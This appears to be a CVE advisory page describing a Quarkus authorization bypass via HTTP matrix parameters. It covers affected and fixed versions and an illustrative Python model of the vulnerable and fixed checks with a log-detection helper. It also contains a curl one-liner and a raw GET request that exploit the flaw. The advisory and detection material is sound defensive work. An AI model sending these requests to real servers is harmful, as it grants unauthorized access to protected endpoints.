The vulnerability arises from an inconsistency in how Quarkus handles HTTP matrix parameters (semicolons). The security layer performs authorization checks using the raw, unaltered request URI, which fully preserves matrix parameters such as `/api/admin;something`. However, the RESTEasy Reactive routing layer strips these matrix parameters before matching the request to an endpoint. Consequently, a request to `/api/admin;anything` bypasses the security policy intended for `/api/admin`: the security layer evaluates the path with the matrix parameter, while the router sees only the base path `/api/admin` and invokes the protected method. This path‑normalization discrepancy allows unauthenticated or low‑privileged attackers to gain unauthorized access to protected resources. The issue was discovered using the GitHub Security Lab Taskflow Agent and manually verified. Quarkus versions prior to 3.20.6.1, those in the ranges 3.21.0 up to 3.27.3.1, 3.30.0 up to 3.33.1.1, and 3.34.0 up to 3.35.1.1 are affected, with version 3.32.4 specifically confirmed vulnerable. The problem is fixed in releases 3.20.6.1, 3.27.3.1, 3.33.1.1, and 3.35.1.1.
DailyCVE Form
Platform: Quarkus
Version: 3.32.4
Vulnerability: Authorization Bypass
Severity: High
Date: May 4, 2026
Prediction: May 4, 2026
Analytics (What Undercode Says)
Check for vulnerable Quarkus version:
./mvnw quarkus:info | grep "version"
Exploit example (curl command):
curl -k "https://target.com/api/admin;evil"
Simulate the security layer vs. router mismatch:
echo "Security layer sees: /api/admin;evil"
echo "Router sees: /api/admin"
Exploit
GET /api/admin;anything HTTP/1.1
Host: vulnerable-quarkus.com
Authorization: (none or low-privilege token)
The request reaches the protected `/api/admin` endpoint because the router strips `;anything` before matching, while the security layer evaluates the raw path `/api/admin;anything`, finds no policy matching it, and therefore enforces nothing.
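The mismatch described above, modelled as an added example that is not Quarkus code and not part of the original advisory. The policy table, endpoint table, prefix-matching rule and access-log lines are all constructed for illustration and simplify the real Quarkus semantics; the point is that evaluating the policy on the raw path lets `/api/admin;anything` through, whereas normalizing the path the same way the router does before the policy check closes the gap. A small detection helper flags log entries that carry a matrix parameter on a path that normalizes to a protected prefix, which is useful while an upgrade to a fixed release is rolled out.

```python
"""Model of a path-normalization mismatch between an authorization layer and a
router. Added illustration only: policy matching here is a simplified prefix
match, not the real Quarkus implementation."""

# Constructed policy table: protected path prefix -> role required.
POLICY = {"/api/admin": "admin"}

# Constructed endpoint table: endpoint path -> handler name.
ENDPOINTS = {
    "/api/admin": "AdminResource.index",
    "/api/public": "PublicResource.index",
}


def strip_matrix_params(path: str) -> str:
    """Drop ';param=value' matrix parameters from every path segment, which is
    what the routing layer does before it looks up an endpoint."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def policy_for(path: str):
    """Return the role a path requires under the simple prefix policy, or None."""
    for prefix, role in POLICY.items():
        if path == prefix or path.startswith(prefix + "/"):
            return role
    return None


def route(raw_path: str):
    """Router view: matrix parameters are stripped before endpoint lookup."""
    return ENDPOINTS.get(strip_matrix_params(raw_path))


def authorized_vulnerable(raw_path: str, roles: set) -> bool:
    """Vulnerable ordering: the policy is evaluated on the raw path.
    '/api/admin;x' does not match the '/api/admin' prefix, so no role is
    required and the request is allowed through."""
    required = policy_for(raw_path)
    return required is None or required in roles


def authorized_fixed(raw_path: str, roles: set) -> bool:
    """Hardened ordering: normalize the path exactly as the router does, then
    evaluate the policy, so both layers reason about the same path."""
    required = policy_for(strip_matrix_params(raw_path))
    return required is None or required in roles


def handle(raw_path: str, roles: set, fixed: bool) -> str:
    """Return the handler that would run, or 'DENIED' / 'NOT_FOUND'."""
    check = authorized_fixed if fixed else authorized_vulnerable
    if not check(raw_path, roles):
        return "DENIED"
    handler = route(raw_path)
    return handler if handler else "NOT_FOUND"


def flag_matrix_on_protected(log_lines):
    """Detection helper over constructed access-log lines of the form
    'METHOD PATH STATUS': return paths that carry a matrix parameter and
    normalize to a protected prefix."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        path = parts[1]
        if ";" in path and policy_for(strip_matrix_params(path)) is not None:
            hits.append(path)
    return hits


if __name__ == "__main__":
    anonymous = set()
    print(handle("/api/admin;anything", anonymous, fixed=False))  # AdminResource.index
    print(handle("/api/admin;anything", anonymous, fixed=True))   # DENIED
    sample_log = [  # constructed log lines
        "GET /api/admin;anything 200",
        "GET /api/public;x 200",
        "GET /api/admin 403",
    ]
    print(flag_matrix_on_protected(sample_log))  # ['/api/admin;anything']
```

The design point is that the two layers must agree on the path they reason about: whichever normalization the router applies before dispatch has to be applied before the authorization decision as well, otherwise any difference between the two views becomes a bypass.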
Protection from this CVE
Upgrade to any of the patched versions:
- 3.20.6.1
- 3.27.3.1
- 3.33.1.1
- 3.35.1.1
Impact
Unauthenticated or low-privileged users can bypass HTTP path-based authorization, gaining unauthorized access to protected endpoints.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode